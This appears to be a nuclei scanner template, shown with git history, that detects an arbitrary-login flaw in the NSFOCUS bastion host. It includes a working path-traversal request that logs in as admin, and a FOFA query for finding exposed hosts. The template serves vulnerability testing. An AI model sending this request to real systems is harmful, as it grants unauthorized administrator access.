nuclei-templates/http/vulnerabilities/other/nsfocus-auth-bypass.yaml

52 lines
1.5 KiB
YAML
Raw Normal View History

2024-09-10 11:16:55 +00:00
id: nsfocus-auth-bypass
info:
name: Nsfocus - Arbitrary User Login
author: ritikchaddha
severity: high
description: |
Nsfocus bastion host has an arbitrary user login vulnerability. Attackers can use the vulnerability to log in any user by including www/local_user.php
reference:
- https://forum.butian.net/article/251
metadata:
max-request: 2
2024-09-10 17:27:59 +00:00
verified: true
2024-09-10 11:16:55 +00:00
fofa-query: body="/needUsbkey.php?username=" && "NSFOCUS"
tags: nsfocus,auth-bypass
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "contains(tolower(body), 'nsfocus')"
- "contains(header, 'NSFOCUS')"
condition: or
2024-09-10 11:19:58 +00:00
internal: true
2024-09-10 11:16:55 +00:00
- raw:
- |
GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'status": 200'
- type: word
part: content_type
words:
- application/json
2024-09-10 18:09:59 +00:00
# digest: 4a0a00473045022063b4c3a98368aef012d2f94d3888d7a09b3caa1538d37416901cecdd20605844022100c3caf073480a090af06034966b9a5d5ae6bdfe169464af2f85aa9c0e1cdfc7f6:922c64590222798bb761d5b6d8e72950